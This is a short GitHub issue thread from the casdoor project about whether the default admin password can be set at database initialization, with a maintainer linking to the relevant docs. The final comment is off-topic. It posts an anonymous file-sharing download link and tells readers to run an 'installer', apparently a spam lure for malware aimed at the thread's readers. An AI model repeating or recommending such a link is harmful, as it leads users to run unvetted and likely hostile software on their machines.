### ISSUE TITLE
Choose the default admin password at initialization

### ISSUE THREAD

**Issue by viico** [casdoor/casdoor#3169]
After some research I think it's not possible to choose the default admin password (123) at database initialization. Should it be possible to have a parameter for this value ?

For example an environment variable filled in the docker-compose.

**Comment by hsluoyz** [comment]
@viico it's possible. See Data Initialization docs: https://casdoor.org/docs/deployment/data-initialization

**Comment by Shadi201711** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
